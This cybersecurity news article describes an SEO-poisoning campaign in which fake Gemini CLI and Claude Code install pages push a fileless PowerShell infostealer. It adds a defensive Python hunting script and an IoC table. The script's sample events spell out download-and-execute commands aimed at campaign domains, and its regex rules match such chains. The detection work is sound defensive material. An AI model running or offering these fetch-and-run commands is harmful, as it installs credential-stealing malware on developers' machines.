SEO Poisoning Impersonates Gemini CLI & Claude Install
Malicious actors are using SEO poisoning to push fake installation pages for two popular AI coding tools, Gemini CLI and Claude Code, above the genuine ones in search results. The campaign specifically targets software developers, tricking them into running a command on their own machines that hands the attacker control of the workstation.
The campaign began surfacing in early March 2026 and has expanded beyond AI tools. Victims are lured to fake pages nearly identical to official installation guides, where they paste a single PowerShell command into their terminal.
That one action quietly deploys a powerful infostealer capable of draining credentials, session tokens, and sensitive files.
EclecticIQ analysts identified this ongoing campaign and found that the malware is fetched and executed entirely in memory through PowerShell, leaving no files on disk.
EclecticIQ said in a report shared with Cyber Security News (CSN) that the infostealer harvests credentials from a wide range of applications before exfiltrating the results in encrypted form to a command-and-control server.
The stolen data includes OAuth tokens, CI/CD credentials, corporate VPN details, and session cookies from platforms like Slack, Microsoft Teams, Discord, and Telegram.
A valid session cookie lets an attacker step directly into a victim’s workspace, bypassing both passwords and multi-factor authentication. This access fuels demand in underground access broker markets.
Beyond credential theft, the malware gives attackers the ability to run additional code on infected machines remotely.
While no persistence mechanism was found in the script, this capability means operators can follow up with deeper intrusions, turning a single developer workstation into an enterprise-wide breach.
Hackers Use SEO Poisoning
The infection chain is simple but effective. A developer searches for how to install Gemini CLI or Claude Code, and the top result looks exactly like the official page.
In the Gemini campaign, victims were directed to geminicli[.]co[.]com, whose install instructions include a PowerShell command that silently fetches a script named Install.ps1 from gemini-setup[.]com and executes it; that first stage pulls down the infostealer itself.

What makes this trick so convincing is that the real Gemini CLI installs in parallel. The genuine npm package completes in the terminal, giving users every reason to believe nothing went wrong.
By the time the tool is ready, the infostealer has already finished collecting and sending the victim’s data.

The Claude Code campaign followed the same playbook. On March 30, 2026, the threat actor registered claudecode[.]co[.]com and claude-setup[.]com using identical naming patterns.
The cloned page matched official documentation closely enough to deceive most users, and exfiltrated data was sent to events[.]ms709[.]com.

EclecticIQ analysts pivoted from those domains using passive DNS records and uncovered a cluster of over 30 malicious domains also impersonating Node.js, Chocolatey, KeePassXC, and Monero.
Most were registered between late March and early April 2026, pointing to a coordinated, active campaign.
Fileless PowerShell Stealer Built to Evade Detection
Once the second-stage payload runs, it immediately disables core Windows defenses. It patches Event Tracing for Windows to suppress logging and bypasses the Antimalware Scan Interface, letting the rest of the script run undetected.

The script runs to roughly 6,800 lines, padded with junk code, and includes a sandbox check to avoid analysis environments. The stealer loads three C# components at runtime to probe deeper into the host.
One dumps Windows Credential Manager entries, another captures screen resolution for fingerprinting, and a third enumerates running processes through the Restart Manager API rather than the usual process-listing calls, to sidestep detection.

Everything runs inside PowerShell without writing a single file to disk. The in-process ETW and AMSI tampering only takes effect after the process has started, so the process-creation record (Security event 4688 with command-line auditing enabled, or Sysmon Event ID 1) still captures the pasted command. EclecticIQ recommends hunting for the irm | iex pattern in command-line logs and alerting on hidden PowerShell executions; the same hunt should also cover the spelled-out Invoke-RestMethod / Invoke-WebRequest and Invoke-Expression forms and -EncodedCommand launches, which carry the same chain under a different surface.
Enforcing PowerShell Constrained Language Mode (through WDAC or AppLocker, since the environment-variable form is easily undone) disables Add-Type and the arbitrary .NET calls that runtime-loaded C# components depend on; using FIDO keys for privileged accounts and issuing short-lived OAuth tokens meaningfully limit the damage if credentials are stolen.
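The hunt described above can be expressed as detection-as-code. The Python below is an added example written for this article, not EclecticIQ's or any vendor's tooling: it scores process command lines for download-and-execute chains (irm/iwr or a WebClient DownloadString fed into iex), for hidden-window and encoded-command launches, decodes -EncodedCommand payloads before matching, and flags any command that names a domain from the IoC list at the end of this article. The events are constructed samples shaped like the command-line field of Security 4688 / Sysmon Event ID 1 records, not real telemetry; the npm package name in the first sample is assumed to be the genuine Gemini CLI package, the rule set and severity scale are the example's own, and the campaign hostnames are built at runtime from the defanged IoCs so the page itself never carries a live domain.

```python
"""Hunt process-creation telemetry for the PowerShell download-and-execute
chain used by the fake installer campaign (irm ... | iex), plus the hidden
and encoded launches that usually travel with it. Added example for this
article; the rules and sample events are the example's own, not EclecticIQ's."""
import base64
import re
from typing import Optional

# Defanged domains copied from the article's IoC list. They are re-fanged only
# inside this script, so no live hostname appears on the page.
IOC_DOMAINS_DEFANGED = [
    "geminicli[.]co[.]com", "gemini-setup[.]com",
    "claudecode[.]co[.]com", "claude-setup[.]com",
    "events[.]msft23[.]com", "events[.]ms709[.]com",
]


def refang(indicator: str) -> str:
    """Turn 'example[.]com' back into 'example.com' for matching only."""
    return indicator.replace("[.]", ".")


IOC_DOMAINS = {refang(d) for d in IOC_DOMAINS_DEFANGED}

# Download primitives (cmdlets, their aliases and the .NET fallback) and the
# execution sinks they are piped or wrapped into.
_DOWNLOAD = (r"(?:\b(?:irm|iwr|invoke-restmethod|invoke-webrequest)\b|"
             r"\(?\s*new-object\s+(?:system\.)?net\.webclient\s*\)?\.downloadstring)")
_EXEC = r"\b(?:iex|invoke-expression)\b"

RULES = {
    # irm https://... | iex   (the exact pattern EclecticIQ says to hunt for)
    "download_piped_to_exec": re.compile(_DOWNLOAD + r"[^|]*\|\s*" + _EXEC, re.I),
    # iex (irm https://...)   (same chain written as a call instead of a pipe)
    "exec_wrapping_download": re.compile(_EXEC + r"\s*\(\s*" + _DOWNLOAD, re.I),
    # -w hidden / -WindowStyle Hidden: the hidden-execution signal
    "hidden_window": re.compile(r"-w(?:indowstyle)?\s+hidden\b", re.I),
    # -e / -ec / -enc / -EncodedCommand followed by base64 of a UTF-16LE script
    "encoded_command": re.compile(
        r"-e(?:c|nc(?:odedcommand)?)?\s+([A-Za-z0-9+/=]{16,})", re.I),
}


def decode_encoded_command(cmd: str) -> Optional[str]:
    """Return the plaintext behind -EncodedCommand, or None if absent/invalid."""
    m = RULES["encoded_command"].search(cmd)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None


def analyze_command_line(cmd: str) -> dict:
    """Score one command line: rule hits, decoded payload, IoC domains, verdict."""
    decoded = decode_encoded_command(cmd)
    text = cmd if decoded is None else cmd + "\n" + decoded  # match both layers
    hits = [name for name, rx in RULES.items() if rx.search(text)]
    iocs = sorted(d for d in IOC_DOMAINS if d in text.lower())
    exec_chain = {"download_piped_to_exec", "exec_wrapping_download"} & set(hits)
    evasion = {"hidden_window", "encoded_command"} & set(hits)
    if iocs:
        verdict = "critical"   # contact with known campaign infrastructure
    elif exec_chain and evasion:
        verdict = "high"       # fetch-and-run plus a hidden or encoded launch
    elif exec_chain:
        verdict = "medium"     # fetch-and-run alone: admins do this too, triage it
    elif hits:
        verdict = "low"        # hidden/encoded without a fetch: worth a look
    else:
        verdict = "benign"
    return {"verdict": verdict, "rules": hits, "iocs": iocs, "decoded": decoded}


def hunt(events: list) -> list:
    """Run every event through the rules; return only those worth a ticket."""
    findings = []
    for ev in events:
        result = analyze_command_line(ev["cmd"])
        if result["verdict"] != "benign":
            findings.append({"pid": ev["pid"], **result})
    return findings


def _b64_utf16(script: str) -> str:
    """Encode a script the way powershell.exe -EncodedCommand expects it."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample telemetry (not real logs). Hostnames come from the
# defanged IoCs above; the npm package name is assumed to be the real one.
SAMPLE_EVENTS = [
    # pasted from a fake install page: fetch-and-run, hidden window, then the
    # genuine npm install so the developer sees a successful setup
    {"pid": 4112, "cmd": 'powershell.exe -w hidden -c "irm https://'
     + refang("gemini-setup[.]com")
     + '/Install.ps1 | iex; npm install -g @google/gemini-cli"'},
    # same chain hidden inside -EncodedCommand, using the .NET fallback
    {"pid": 4180, "cmd": "powershell.exe -NoProfile -enc " + _b64_utf16(
        "IEX (New-Object Net.WebClient).DownloadString('https://"
        + refang("claude-setup[.]com") + "/Install.ps1')")},
    # hidden window but no fetch: noisy, not malicious on its own
    {"pid": 4220, "cmd": 'powershell.exe -w hidden -c "Get-Process | Where-Object CPU -gt 100"'},
    # ordinary build script, should stay silent
    {"pid": 4301, "cmd": "powershell.exe -ExecutionPolicy Bypass -File .\\build.ps1"},
    # fetch-and-run from a host not on the IoC list, launched hidden
    {"pid": 4330, "cmd": 'powershell.exe -w hidden -c "irm https://example.invalid/setup.ps1 | iex"'},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"pid={f['pid']} verdict={f['verdict']} rules={f['rules']} iocs={f['iocs']}")
```

Feed it the CommandLine field from your SIEM export instead of SAMPLE_EVENTS; the verdict tiers are deliberately coarse so the "medium" bucket (fetch-and-run without evasion flags or known infrastructure) can be tuned against the legitimate one-liners your own developers use.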
Indicators of Compromise (IoCs)
| Type | Indicator | Description |
|---|---|---|
| Domain | geminicli[.]co[.]com | Fake Gemini CLI installation page |
| Domain | gemini-setup[.]com | Hosts infostealer downloader payload (Install.ps1) |
| Domain | claudecode[.]co[.]com | Fake Claude Code installation page |
| Domain | claude-setup[.]com | Hosts Claude Code infostealer payload |
| Domain | events[.]msft23[.]com | C2 server for Gemini CLI campaign |
| Domain | events[.]ms709[.]com | C2 server for Claude Code campaign |
| Domain | api[.]bio9438[.]com | Attacker-controlled infrastructure |
| Domain | claudecode-install[.]co[.]com | Attacker-controlled domain |
| Domain | openclow[.]co[.]com | Attacker-controlled domain |
| Domain | geninicli[.]co[.]com | Attacker-controlled domain (typosquat) |
| Domain | keepassxc[.]us[.]org | Fake KeePassXC impersonation domain |
| Domain | claude-code[.]co[.]com | Attacker-controlled domain |
| Domain | chocolatey[.]net | Attacker-controlled Chocolatey impersonation |
| Domain | chocolatey-setup[.]co[.]com | Fake Chocolatey installation page |
| Domain | get-monero[.]co[.]uk | Fake Monero impersonation domain |
| Domain | getmonero[.]us[.]com | Fake Monero impersonation domain |
| Domain | metrics[.]msft17[.]com | Attacker-controlled infrastructure |
| Domain | claude-setup[.]com | Payload staging domain |
| Domain | keepassxc[.]us[.]com | Fake KeePassXC impersonation domain |
| Domain | olive3451[.]com | Attacker-controlled domain |
| Domain | chocolatey-download[.]co[.]com | Fake Chocolatey download domain |
| Domain | chocolatey[.]co[.]com | Fake Chocolatey impersonation domain |
| IP Address | 109.107.170[.]111 | Netherlands-based bulletproof hosting (MIRhosting) |
| SHA-256 | ff81cb9263fcde5870a0748fd6af2d30a4ba864415c15ca14827d0dd723eb60c | Infostealer payload hash |
| SHA-256 | 9c87e8162b39fbb773c416006b16f8e34aca53372d1b2d4a584df0ffc69ad333 | Infostealer payload hash |
| SHA-256 | 89d634c8471382ff9c6fd966008ad5c376d7a0edae8f799eb569837170f2373d | Infostealer payload hash |
| SHA-256 | be2ff065a232a3a6f187f9fb03a6c1b368dff3d2ba0966777b1f5503aa5ecd16 | Infostealer payload hash |
| SHA-256 | a1c5e1d9bdc1a931c11ac6fdfdff1fbc69ff88521cf443cb174f9720a05fe72d | Infostealer payload hash |
| SHA-256 | bb78f024c4d8b5a6a128aacb498acad025a234a6b25fde36ff2e14601134555f | Infostealer payload hash |
| SHA-256 | a6525b37b0cc5339df375e17a0c10772b50c9d425001b0c3a9dada995c7f62dd | Infostealer payload hash |
| SHA-256 | b37ee243518221017bab0eb4b54b5431571cc21e54113698ce49a89b89993754 | Infostealer payload hash |
| SHA-256 | aa350580ae5ea46544ffa15c324ab4225dff0dcc5842ac5ca8e2dc4018e5ffad | Infostealer payload hash |
| SHA-256 | 65e1a542bb7d995cc4aa6c71191da125f14f99ca03da7266f5b071440d6d229a | Infostealer payload hash |
| SHA-256 | 64d2a9a49e27d89f1b3489d7db29c3a3a12b4b090f59c24b694c239cb55db262 | Infostealer payload hash |
| SHA-256 | 2d7a94e4a0fedcf31cdd43b06222add9d1888fecb2c5488afc658d08c3f40116 | Infostealer payload hash |
| File Name | Install.ps1 | First-stage infostealer downloader PowerShell script |
Note: IP addresses and domains are intentionally defanged (e.g., [.]) to prevent accidental resolution or hyperlinking. Re-fang only within controlled threat intelligence platforms such as MISP, VirusTotal, or your SIEM.
Disclaimer: HackersRadar reports on cybersecurity threats and incidents for informational and awareness purposes only. We do not engage in hacking activities, data exfiltration, or the hosting or distribution of stolen or leaked information. All content is based on publicly available sources.